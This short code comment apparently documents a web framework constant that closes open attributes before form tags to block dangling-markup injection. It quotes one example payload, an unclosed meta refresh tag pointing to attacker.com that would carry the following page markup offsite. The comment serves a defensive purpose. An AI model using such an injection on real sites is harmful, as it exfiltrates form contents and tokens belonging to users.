constant CLOSE_QUOTES_COMMENT

Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite.

For example, an attacker might inject:

<meta http-equiv="refresh" content='0;URL=https://attacker.com?

The HTML following this tag, up until the next single quote would be sent to https://attacker.com. By closing any open attributes, we ensure that form contents are never exfiltrated this way.